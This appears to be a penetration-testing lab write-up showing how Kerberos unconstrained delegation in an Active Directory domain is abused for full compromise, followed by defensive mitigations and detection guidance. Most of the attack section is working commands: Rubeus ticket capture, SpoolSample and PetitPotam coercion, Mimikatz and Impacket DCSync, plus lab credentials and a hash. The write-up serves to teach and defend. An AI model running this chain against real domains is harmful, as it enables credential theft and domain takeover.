Domain Escalation, Privilege Escalation, Red Teaming

Domain Escalation: Unconstrained Delegation

by raj

This research article documents a complete Active Directory domain compromise achieved through the abuse of Kerberos Unconstrained Delegation. Starting with a low-privileged domain user account (raj), the attack chain demonstrates how misconfigured delegation settings on a workstation (MSEDGEWIN10), combined with authentication coercion techniques (MS-RPRN Printer Bug and MS-EFSRPC via PetitPotam), allow an attacker to capture a Ticket-Granting Ticket (TGT) belonging to the Domain Controller computer account (DC$).

Table of Contents

  • Introduction
  • Attack Overview
  • Lab Setup
    • Active Directory Configuration
    • Delegation Settings
  • Attack Chain — Step-by-Step Walkthrough
    • Initial Foothold and Privilege Confirmation
    • Enumerating Unconstrained Delegation
  • Local Attack Method
    • Starting Rubeus TGT Monitoring
    • Triggering Authentication via SpoolSample
    • Capturing the DC$ TGT
    • Pass-the-Ticket (PTT)
    • Performing DCSync (Windows)
  • Remote Attack Method
    • Connecting via Evil-WinRM
    • Running Rubeus Monitor
    • Exploiting MS-EFSRPC (PetitPotam)
    • Capturing TGT Remotely
    • Converting Ticket (Kirbi → ccache)
    • DCSync via Impacket (Linux)
  • Defensive Mitigations
    • Eliminating Unconstrained Delegation
    • Blocking Coercion Techniques
    • Protecting Against TGT Theft
    • Detecting DCSync Activity
    • Network Segmentation

The attack involves five major phases:

  • Reconnaissance — Discovering unconstrained delegation accounts.
  • Initial Access — Connecting to MSEDGEWIN10 via Evil-WinRM.
  • Coerced Authentication — Forcing the DC machine account to authenticate to a controlled host using PetitPotam or SpoolSample.
  • TGT Capture — Intercepting the DC’s Kerberos TGT with Rubeus.
  • DCSync / Credential Dumping — Using the captured ticket to dump all domain credentials.

Lab Setup

  1. Open Active Directory Users and Computers (ADUC).
  2. Navigate to your domain: ignite.local → Computers
  3. Locate the machine: MSEDGEWIN10
  4. Right-click on MSEDGEWIN10
  5. Click on Properties

Configuring Delegation

  1. In the Properties window, go to the Delegation tab.
  2. You’ll see delegation options (important for Kerberos authentication).
  3. Select: Trust this computer for delegation to any service (Kerberos only)

Attack Chain — Step-by-Step Walkthrough

The complete attack is divided into two parallel paths

  • Path A using SpoolSample/Rubeus from the compromised workstation
  • Path B using PetitPotam from the Linux attacker machine) that both converge on the same outcome: extraction of the DC$ TGT followed by domain compromise.

Initial Foothold and Privilege Confirmation

Establishing Local Admin on MSEDGEWIN10

The attacker (operating with some initial elevated context — e.g., from a phishing payload or local exploit) adds the domain user raj to the local Administrators group on MSEDGEWIN10:

net localgroup Administrators "ignite.local\raj" /add
net localgroup Administrators

This gives raj the ability to run tools as a local administrator on MSEDGEWIN10, which is necessary to interact with LSASS and import Kerberos tickets into the current session.

Enumerating Unconstrained Delegation from Kali

The first step is to identify which accounts have unconstrained delegation enabled. The attacker uses Impacket’s findDelegation utility from Kali Linux:

impacket-findDelegation ignite.local/raj:Password@1 -dc-ip 192.168.1.11

The output confirms that both the Domain Controller (DC$) and MSEDGEWIN10$ are configured with Unconstrained Delegation. Since MSEDGEWIN10 is the host where raj has local admin rights, the attack is viable: if DC$ authenticates to MSEDGEWIN10, its TGT will be cached there and can be stolen.

Local Method

Starting Rubeus TGT Monitor

Rubeus is launched in monitoring mode to capture any new TGTs belonging to the dc$ machine account as they arrive in the LSASS cache. The /nowrap flag ensures Base64 ticket output is not broken across lines, making it easier to copy for later use:

\Rubeus.exe monitor /interval:7 /targetuser:dc$ /nowrap

Rubeus polls every 7 seconds for new TGTs in the LSASS cache matching the target user dc$.

Triggering Authentication via SpoolSample (MS-RPRN)

In a second terminal window (or session) on MSEDGEWIN10, SpoolSample.exe is executed. It tells the Domain Controller (dc.ignite.local) to send an authentication callback to MSEDGEWIN10:

Kerberos, and because MSEDGEWIN10 is configured for Unconstrained Delegation, Windows automatically cached the DC$’s full TGT in LSASS.

SpoolSample.exe dc.ignite.local MSEDGEWIN10

TGT Captured by Rubeus

Within seconds, Rubeus detects and displays the newly cached DC$ TGT:

The Flags field confirms the ticket is forwarded and forwardable, meaning it carries full delegation rights. This TGT is valid for 10 hours and can be used to perform a DCSync.

Rubeus.exe monitor /interval:7 /targetuser:dc$ /nowrap

Importing the TGT (Pass-the-Ticket)

The captured Base64 ticket is imported into the current Windows session using Rubeus ptt (pass-the-ticket):

The klist command confirms the ticket is now in the current session’s Kerberos cache:

Rubeus.exe ptt /ticket:doIE6DCCBOSgAwIBBaEDAgEWooID8j...[base64 blob]

klist

 Running DCSync with the DC$ TGT (Windows)

With the DC$ TGT active in the current Kerberos cache, Mimikatz‘s lsadump::dcsync module is used. Normally, DCSync requires Domain Admin or Domain Controller replication rights. However, because the session is now impersonating DC$, which inherently has replication privileges, this step succeeds:

mimikatz.exe
lsadump::dcsync /domain:ignite.local /user:ignite\administrator

The NTLM hash 32196b56ffe6f45e294117b91a83bf38 for the domain Administrator account is now in the attacker’s possession. This hash can be used in a Pass-the-Hash attack to authenticate as Administrator to any domain-joined system without knowing the plaintext password.

Remote Method

Connecting to MSEDGEWIN10 via Evil-WinRM

Using raj’s credentials and Evil-WinRM, the attacker establishes an authenticated remote shell on MSEDGEWIN10:

evil-winrm -i 192.168.1.10 -u 'ignite.local\raj' -p Password@1

Starting Rubeus TGT Monitor

On MSEDGEWIN10, Rubeus is run in monitor mode to watch for incoming TGTs from the DC machine account:

.\Rubeus.exe monitor /interval:7 /targetuser:dc$ /nowrap

Downloading PetitPotam

Discovered by researcher Gilles Lionel (@topotam77) in 2021, PetitPotam abuses Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). Several EFS RPC functions — including EfsRpcOpenFileRaw — can be called by unauthenticated or low-privileged users to coerce a target machine into authenticating to an arbitrary host. This makes it a particularly powerful coercion primitive as it does not rely on the Print Spooler service.

wget https://raw.githubusercontent.com/topotam/PetitPotam/refs/heads/main/PetitPotam.py

MS-EFSRPC (PetitPotam)

PetitPotam is executed with raj’s credentials, targeting the Domain Controller (dc.ignite.local) and instructing it to authenticate back to the capture host (msedgewin10.ignite.local, which is running Rubeus in monitor mode):

python PetitPotam.py -u raj -p Password@1 -d ignite.local msedgewin10.ignite.local dc.ignite.local

Both SpoolSample and PetitPotam achieve the same goal: they trick the DC into initiating an outbound Kerberos authentication to MSEDGEWIN10. Because MSEDGEWIN10 has unconstrained delegation, the DC’s TGT is forwarded and cached in LSASS.

Second TGT Captured

Rubeus (running on MSEDGEWIN10 via the Evil-WinRM session) captures the new TGT from the PetitPotam-triggered authentication, identical in structure to the first capture

Converting the Ticket for Linux Use

On Kali Linux, the Base64 ticket is saved to a file, decoded to binary kirbi format, and then converted to ccache format (which Impacket tools consume):

# Save the Base64 ticket

cat ticket.b64 | base64 -d > ticket.kirbi

# Convert to ccache format

impacket-ticketConverter ticket.kirbi ticket.ccache

DCSync from Linux Using the Kerberos ccache

The ccache file is set as the active Kerberos credential store using the KRB5CCNAME environment variable. Impacket-secretsdump is then called with -k (use Kerberos) and -no-pass, instructing it to use the cached DC$ TGT for replication authentication:

export KRB5CCNAME=ticket.ccache

impacket-secretsdump -k -no-pass dc.ignite.local -just-dc

Every account in the domain — including Administrator, krbtgt, all users, and computer accounts — has been exfiltrated. The krbtgt hash is the most dangerous: it allows for the creation of Golden Tickets, granting permanent, offline domain access that persists even after password resets (unless krbtgt is reset twice).

Defensive Mitigations

Eliminate Unconstrained Delegation

  • Audit all accounts with unconstrained delegation using PowerShell:
  • Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
  • Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
  • Migrate to Constrained Delegation or Resource-Based Constrained Delegation (RBCD) wherever possible.
  • Mark high-privilege accounts (Domain Admins, Enterprise Admins) as “Account is sensitive and cannot be delegated” in ADUC.

Block Coercion Techniques

  • Disable the Print Spooler service on Domain Controllers (blocks SpoolSample/PrinterBug):
  • Stop-Service -Name Spooler -Force
  • Set-Service -Name Spooler -StartupType Disabled
  • Apply Microsoft’s patch for PetitPotam (CVE-2021-36942) and enforce EPA (Extended Protection for Authentication) on ADCS web enrollment endpoints.
  • Block outbound SMB (port 445) and RPC from DCs to workstations via firewall rules.

Protect Against TGT Theft

  • Enable Credential Guard on Windows 10/11 and Server 2016+ to protect LSASS from memory reads.
  • Deploy Protected Users Security Group — members cannot use unconstrained delegation and do not cache credentials in LSASS.
  • Monitor for Event ID 4769 (Kerberos Service Ticket requests) with unusual forwardable flags.

Detect DCSync Activity

  • Event ID 4662 — Log and alert on DS-Replication-Get-Changes-All permission usage.
  • Deploy Endpoint Detection and Response (EDR) solutions that detect lsadump::dcsync patterns.
  • Implement Microsoft Defender for Identity (formerly ATA) which specifically detects DCSync attacks.

Network Segmentation

  • Enforce that Domain Controllers cannot initiate outbound connections to workstations.
  • Use Windows Firewall with Advanced Security to restrict RPC/SMB access on DCs.

Conclusion

The Unconstrained Kerberos Delegation attack chain demonstrates how a single misconfiguration — trusting a workstation for unconstrained delegation — can cascade into a full domain compromise. The attacker required only standard domain credentials to begin the chain, and through a combination of coerced authentication and Kerberos ticket theft, obtained the Domain Administrator’s NTLM hash without ever needing to know any privileged password.

The key takeaway for defenders is that unconstrained delegation is a legacy feature that should be eliminated from modern Active Directory environments. Coupling this with robust monitoring for Kerberos anomalies, blocking authentication coercion vectors (Print Spooler, MS-EFSRPC), and deploying Credential Guard significantly reduces the attack surface exposed by this class of vulnerability.

Author: Harshit Rajpal is an InfoSec researcher and left and right-brain thinker. Contact here

You may like

Active Directory Lab Setup for Penetration Testing Using PowerShell

April 17, 2026

Lateral Movement: Enabling RDP Remotely

April 16, 2026